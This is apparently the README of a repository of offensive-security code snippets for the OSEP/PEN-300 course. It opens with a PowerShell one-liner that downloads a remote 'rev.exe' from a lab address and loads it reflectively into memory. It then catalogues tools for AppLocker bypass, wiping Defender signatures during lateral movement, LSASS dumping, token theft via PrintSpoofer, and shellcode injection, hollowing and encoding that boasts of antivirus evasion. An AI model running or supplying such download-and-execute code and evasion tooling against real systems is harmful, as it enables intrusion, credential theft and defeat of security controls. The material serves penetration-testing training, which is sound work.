/OSEP-Code-Snippets

A repository with my notable code snippets for Offensive Security's PEN-300 (OSEP) course.

Primary LanguageC#

OSEP Code Snippets

Code examples are provided as-is, without any form of warranty. Based on Offensive Security's PEN-300 course.

Classes and methods are public, so most binaries should allow for reflective loading as below.

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main("".Split())

Contents

Snippet Name Description
AppLocker Bypass PowerShell Runspace (C#) Base binary for an applocker bypass using a combination of CertUtil, BitsAdmin, and InstallUtil. See README.md for details.
Fileless Lateral Movement (C#) Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as SensorService.
Linux Shellcode Encoder (Python) A utility script to encode C# payloads from Linux, automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.
Linux Shellcode Loaders (C) Various C-based shellcode loaders, including base binaries for library hijacking.
MiniDump (C# & PS1) A simple binary to Dump LSASS to C:\Windows\Tasks\lsass.dmp. Also provided as native PowerShell script.
MSSQL (C#) An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.
PrintSpoofer.NET (C#) Steals the token of the incoming authentication forced with the PrintSpooler exploit, and use that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.
ROT Shellcode Encoder (C#) A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.
Sections Shellcode Process Injector (C#) Injects and runs shellcode using NtCreateSection, NtMapViewOfSection, NtUnMapViewOfsection and NtClose instead of the "standard" method.
Shellcode Process Hollowing (C#) Hollows a svchost process and runs the shellcode from there. Scores 0/68 on VirusTotal at the time of writing.
Shellcode Process Injector (C# & PS1) Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as native PowerShell script (though it is a bit simpler).
Simple Shellcode Runner (C# & PS1 & VBA) The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.
XOR Shellcode Encoder (C#) A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.